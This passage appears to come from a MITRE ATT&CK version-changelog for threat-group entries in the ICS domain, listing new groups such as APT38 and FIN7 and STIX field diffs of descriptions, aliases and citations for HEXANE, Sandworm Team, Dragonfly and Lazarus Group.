external_references[15]['description']F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.
external_references[15]['url']https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdfhttps://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html
external_references[16]['source_name']InfoSecurity Sandworm Oct 2014US District Court Indictment GRU Unit 74455 October 2020
external_references[16]['description']Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.
external_references[16]['url']https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/https://www.justice.gov/opa/press-release/file/1328521/download
external_references[17]['source_name']Dragos ELECTRUMSecureworks IRON VIKING
external_references[17]['description']Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.
external_references[17]['url']https://www.dragos.com/resource/electrum/https://www.secureworks.com/research/threat-profiles/iron-viking
external_references[18]['source_name']Secureworks IRON VIKING UK NCSC Olympic Attacks October 2020
external_references[18]['description']Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.
external_references[18]['url']https://www.secureworks.com/research/threat-profiles/iron-vikinghttps://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games
x_mitre_version2.12.2

ics-attack

New Groups

[G0057] APT34

Current version: 1.0


[G0082] APT38

Current version: 2.0

Description: [APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.


[G0037] FIN6

Current version: 3.2

Description: [FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)


[G0046] FIN7

Current version: 2.1

Description: [FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has been active since 2013 primarily targeting the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. Since 2020 [FIN7](https://attack.mitre.org/groups/G0046) shifted operations to a big game hunting (BGH) approach including use of [REvil](https://attack.mitre.org/software/S0496) ransomware and their own Ransomware as a Service (RaaS), Darkside. [FIN7](https://attack.mitre.org/groups/G0046) may be linked to the [Carbanak](https://attack.mitre.org/groups/G0008) Group, but there appears to be several groups using [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)


[G0115] GOLD SOUTHFIELD

Current version: 1.1

Description: [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2019 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)


[G0102] Wizard Spider

Current version: 2.0

Description: [Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020)

Major Version Changes

[G1001] HEXANE

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[HEXANE](https://collaborate.mitre.org/attackics/index.php/Gt1[HEXANE](https://attack.mitre.org/groups/G1001) is a cyber e
>roup/G0005) is a threat group that has targeted ICS organiza>spionage threat group that has targeted oil & gas, telecommu
>tion within the oil & gas, and telecommunications sectors. M>nications, aviation, and internet service provider organizat
>any of the targeted organizations have been located in the M>ions since at least 2017. Targeted companies have been locat
>iddle East including Kuwait. HEXANE's targeting of telecommu>ed in the Middle East and Africa, including Israel, Saudi Ar
>nications has been speculated to be part of an effort to est>abia, Kuwait, Morocco, and Tunisia. [HEXANE](https://attack.
>ablish man-in-the-middle capabilities throughout the region.>mitre.org/groups/G1001)'s TTPs appear similar to [APT33](htt
> HEXANE's TTPs appear similar to [APT33](https://collaborate>ps://attack.mitre.org/groups/G0064) and [OilRig](https://att
>.mitre.org/attackics/index.php/Group/G0003) and [OilRig](htt>ack.mitre.org/groups/G0049) but due to differences in victim
>ps://collaborate.mitre.org/attackics/index.php/Group/G0010) >s and tools it is tracked as a separate entity.(Citation: Dr
>but due to differences in victims and tools it is tracked as>agos Hexane)(Citation: Kaspersky Lyceum October 2021)(Citati
> a separate entity. (Citation: Dragos Hexane Oct 2019)>on: ClearSky Siamesekitten August 2021)(Citation: Accenture 
 >Lyceum Targets November 2021)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Dragos Threat Intelligence', 'Mindaugas Gudzis, BT Security']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://dragos.com/resource/hexane/
values_changed
STIX FieldOld valueNew Value
modified2020-01-05 20:13:49.069000+00:002022-08-31 22:16:30.454000+00:00
description[HEXANE](https://collaborate.mitre.org/attackics/index.php/Group/G0005) is a threat group that has targeted ICS organization within the oil & gas, and telecommunications sectors. Many of the targeted organizations have been located in the Middle East including Kuwait. HEXANE's targeting of telecommunications has been speculated to be part of an effort to establish man-in-the-middle capabilities throughout the region. HEXANE's TTPs appear similar to [APT33](https://collaborate.mitre.org/attackics/index.php/Group/G0003) and [OilRig](https://collaborate.mitre.org/attackics/index.php/Group/G0010) but due to differences in victims and tools it is tracked as a separate entity. (Citation: Dragos Hexane Oct 2019)[HEXANE](https://attack.mitre.org/groups/G1001) is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://attack.mitre.org/groups/G1001)'s TTPs appear similar to [APT33](https://attack.mitre.org/groups/G0064) and [OilRig](https://attack.mitre.org/groups/G0049) but due to differences in victims and tools it is tracked as a separate entity.(Citation: Dragos Hexane)(Citation: Kaspersky Lyceum October 2021)(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Group/G0005https://attack.mitre.org/groups/G1001
external_references[1]['source_name']HEXANESpirlin
external_references[1]['description'](Citation: Dragos Hexane Oct 2019)(Citation: Accenture Lyceum Targets November 2021)
external_references[2]['source_name']LyceumSiamesekitten
external_references[2]['description'](Citation: SecureWorks LYCEUM August 2019)(Citation: ClearSky Siamesekitten August 2021)
external_references[3]['source_name']Dragos Hexane Oct 2019Lyceum
external_references[3]['description']Dragos. (n.d.). Hexane. Retrieved October 27, 2019(Citation: SecureWorks August 2019)
external_references[4]['source_name']SecureWorks LYCEUM Nov 2019Accenture Lyceum Targets November 2021
external_references[4]['description']SecureWorks. (2019, August 27). LYCEUM Takes Center Stage in Middle East Campaign. Retrieved November 19, 2019.Accenture. (2021, November 9). Who are latest targets of cyber group Lyceum?. Retrieved June 16, 2022.
external_references[4]['url']https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaignhttps://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesSiamesekitten
aliasesSpirlin
external_references{'source_name': 'ClearSky Siamesekitten August 2021', 'description': 'ClearSky Cyber Security . (2021, August). New Iranian Espionage Campaign By “Siamesekitten” - Lyceum. Retrieved June 6, 2022.', 'url': 'https://www.clearskysec.com/siamesekitten/'}
external_references{'source_name': 'Dragos Hexane', 'description': 'Dragos. (n.d.). Hexane. Retrieved October 27, 2019.', 'url': 'https://dragos.com/resource/hexane/'}
external_references{'source_name': 'Kaspersky Lyceum October 2021', 'description': 'Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022.', 'url': 'https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf'}
external_references{'source_name': 'SecureWorks August 2019', 'description': 'SecureWorks 2019, August 27 LYCEUM Takes Center Stage in Middle East Campaign Retrieved. 2019/11/19 ', 'url': 'https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign'}
Minor Version Changes

[G0034] Sandworm Team

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Dragos Threat Intelligence']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack', 'mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 21:46:19.437000+00:002022-10-12 20:11:40.313000+00:00
aliases[6]VOODOO BEARVoodoo Bear
external_references[1]['source_name']Sandworm TeamVoodoo Bear
external_references[1]['description'](Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[3]['source_name']TelebotsSandworm Team
external_references[3]['description'](Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[4]['source_name']IRON VIKINGQuedagh
external_references[4]['description'](Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[6]['source_name']QuedaghTelebots
external_references[6]['description'](Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[7]['source_name']VOODOO BEARIRON VIKING
external_references[7]['description'](Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[8]['source_name']US District Court Indictment GRU Unit 74455 October 2020US District Court Indictment GRU Oct 2018
external_references[8]['description']Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
external_references[8]['url']https://www.justice.gov/opa/press-release/file/1328521/downloadhttps://www.justice.gov/opa/page/file/1098481/download
external_references[9]['source_name']UK NCSC Olympic Attacks October 2020Dragos ELECTRUM
external_references[9]['description']UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.
external_references[9]['url']https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-gameshttps://www.dragos.com/resource/electrum/
external_references[10]['source_name']iSIGHT Sandworm 2014F-Secure BlackEnergy 2014
external_references[10]['description']Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.
external_references[10]['url']https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.htmlhttps://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf
external_references[11]['source_name']CrowdStrike VOODOO BEARiSIGHT Sandworm 2014
external_references[11]['description']Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.
external_references[11]['url']https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html
external_references[12]['source_name']USDOJ Sandworm Feb 2020CrowdStrike VOODOO BEAR
external_references[12]['description']Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.
external_references[12]['url']https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.htmlhttps://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/
external_references[13]['source_name']NCSC Sandworm Feb 2020InfoSecurity Sandworm Oct 2014
external_references[13]['description']NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.
external_references[13]['url']https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisoryhttps://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/
external_references[14]['source_name']US District Court Indictment GRU Oct 2018NCSC Sandworm Feb 2020
external_references[14]['description']Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.
external_references[14]['url']https://www.justice.gov/opa/page/file/1098481/downloadhttps://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory
external_references[15]['source_name']F-Secure BlackEnergy 2014USDOJ Sandworm Feb 2020
external_references[15]['description']F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.
external_references[15]['url']https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdfhttps://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html
external_references[16]['source_name']InfoSecurity Sandworm Oct 2014US District Court Indictment GRU Unit 74455 October 2020
external_references[16]['description']Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.
external_references[16]['url']https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/https://www.justice.gov/opa/press-release/file/1328521/download
external_references[17]['source_name']Dragos ELECTRUMSecureworks IRON VIKING
external_references[17]['description']Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.
external_references[17]['url']https://www.dragos.com/resource/electrum/https://www.secureworks.com/research/threat-profiles/iron-viking
external_references[18]['source_name']Secureworks IRON VIKING UK NCSC Olympic Attacks October 2020
external_references[18]['description']Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.
external_references[18]['url']https://www.secureworks.com/research/threat-profiles/iron-vikinghttps://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games
x_mitre_version2.12.2
Other Version Changes

[G0035] Dragonfly

Current version: 3.1

Version changed from: 2.1 → 3.1


Old Description
New Description
t1[Dragonfly](https://attack.mitre.org/groups/G0035) is a cybet1[Dragonfly](https://attack.mitre.org/groups/G0035) is a cybe
>r espionage group that has been active since at least 2011. >r espionage group that has been attributed to Russia's Feder
>They initially targeted defense and aviation companies but s>al Security Service (FSB) Center 16.(Citation: DOJ Russia Ta
>hifted to focus to include the energy sector in early 2013. >rgeting Critical Infrastructure March 2022)(Citation: UK GOV
>They have also targeted companies related to industrial cont> FSB Factsheet April 2022) Active since at least 2010, [Drag
>rol systems. (Citation: Symantec Dragonfly)(Citation: Secure>onfly](https://attack.mitre.org/groups/G0035) has targeted d
>works IRON LIBERTY July 2019)  A similar group emerged in 20>efense and aviation companies, government entities, companie
>15 and was identified by Symantec as [Dragonfly 2.0](https:/>s related to industrial control systems, and critical infras
>/attack.mitre.org/groups/G0074). There is debate over the ex>tructure sectors worldwide through supply chain, spearphishi
>tent of the overlap between [Dragonfly](https://attack.mitre>ng, and drive-by compromise attacks.(Citation: Symantec Drag
>.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.>onfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citatio
>org/groups/G0074), but there is sufficient evidence to lead >n: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly
>to these being tracked as two separate groups. (Citation: Sy> 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)
>mantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 >(Citation: CISA AA20-296A Berserk Bear December 2020)(Citati
>Sept 2017)(Citation: Dragos DYMALLOY )>on: Symantec Dragonfly 2.0 October 2017)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Dragos Threat Intelligence']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttp://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf
external_referenceshttps://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector
external_referenceshttps://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 22:07:18.072000+00:002022-10-19 22:09:02.443000+00:00
description[Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been active since at least 2011. They initially targeted defense and aviation companies but shifted to focus to include the energy sector in early 2013. They have also targeted companies related to industrial control systems. (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019) A similar group emerged in 2015 and was identified by Symantec as [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). There is debate over the extent of the overlap between [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )[Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017)
external_references[1]['source_name']DragonflyDYMALLOY
external_references[1]['description'](Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Dragos DYMALLOY )(Citation: UK GOV FSB Factsheet April 2022)
external_references[2]['source_name']TG-4192Berserk Bear
external_references[2]['description'](Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)
external_references[3]['source_name']Crouching YetiTEMP.Isotope
external_references[3]['description'](Citation: Secureworks IRON LIBERTY July 2019)(Citation: Mandiant Ukraine Cyber Threats January 2022)(Citation: Gigamon Berserk Bear October 2021)
external_references[4]['source_name']IRON LIBERTYCrouching Yeti
external_references[4]['description'](Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)
external_references[5]['source_name']Energetic BearIRON LIBERTY
external_references[5]['description'](Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: UK GOV FSB Factsheet April 2022)
external_references[6]['source_name']Symantec DragonflyTG-4192
external_references[6]['description']Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.(Citation: Secureworks IRON LIBERTY July 2019)(Citation: UK GOV FSB Factsheet April 2022)
external_references[7]['source_name']Secureworks IRON LIBERTY July 2019Dragonfly
external_references[7]['description']Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)
external_references[8]['source_name']Symantec Dragonfly Sept 2017Energetic Bear
external_references[8]['description']Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)
external_references[9]['source_name']Fortune Dragonfly 2.0 Sept 2017CISA AA20-296A Berserk Bear December 2020
external_references[9]['description']Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.CISA. (2020, December 1). Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets. Retrieved December 9, 2021.
external_references[9]['url']http://fortune.com/2017/09/06/hack-energy-grid-symantec/https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions
external_references[10]['source_name']Dragos DYMALLOY DOJ Russia Targeting Critical Infrastructure March 2022
external_references[10]['description']Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.Department of Justice. (2022, March 24). Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide. Retrieved April 5, 2022.
external_references[10]['url']https://www.dragos.com/threat/dymalloy/https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical
external_references[11]['source_name']Secureworks MCMD July 2019Dragos DYMALLOY
external_references[11]['description']Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.
external_references[11]['url']https://www.secureworks.com/research/mcmd-malware-analysishttps://www.dragos.com/threat/dymalloy/
external_references[12]['source_name']Secureworks Karagany July 2019Fortune Dragonfly 2.0 Sept 2017
external_references[12]['description']Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.
external_references[12]['url']https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sectorhttp://fortune.com/2017/09/06/hack-energy-grid-symantec/
x_mitre_version2.13.1
iterable_item_added
STIX FieldOld valueNew Value
aliasesTEMP.Isotope
aliasesDYMALLOY
aliasesBerserk Bear
external_references{'source_name': 'Mandiant Ukraine Cyber Threats January 2022', 'description': 'Hultquist, J. (2022, January 20). Anticipating Cyber Threats as the Ukraine Crisis Escalates. Retrieved January 24, 2022.', 'url': 'https://www.mandiant.com/resources/ukraine-crisis-cyber-threats'}
external_references{'source_name': 'Secureworks MCMD July 2019', 'description': 'Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.', 'url': 'https://www.secureworks.com/research/mcmd-malware-analysis'}
external_references{'source_name': 'Secureworks IRON LIBERTY July 2019', 'description': 'Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.', 'url': 'https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector'}
external_references{'source_name': 'Secureworks Karagany July 2019', 'description': 'Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.', 'url': 'https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector'}
external_references{'source_name': 'Gigamon Berserk Bear October 2021', 'description': 'Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.', 'url': 'https://vblocalhost.com/uploads/VB2021-Slowik.pdf'}
external_references{'source_name': 'Symantec Dragonfly Sept 2017', 'description': 'Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.', 'url': 'https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers'}
external_references{'source_name': 'Symantec Dragonfly', 'description': 'Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.', 'url': 'https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments'}
external_references{'source_name': 'Symantec Dragonfly 2.0 October 2017', 'description': 'Symantec. (2017, October 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved April 19, 2022.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks'}
external_references{'source_name': 'UK GOV FSB Factsheet April 2022', 'description': "UK Gov. (2022, April 5). Russia's FSB malign activity: factsheet. Retrieved April 5, 2022.", 'url': 'https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet'}

[G0032] Lazarus Group

Current version: 3.1

Version changed from: 2.0 → 3.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Kyaw Pyiyt Htet, @KyawPyiytHtet', 'Dragos Threat Intelligence']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
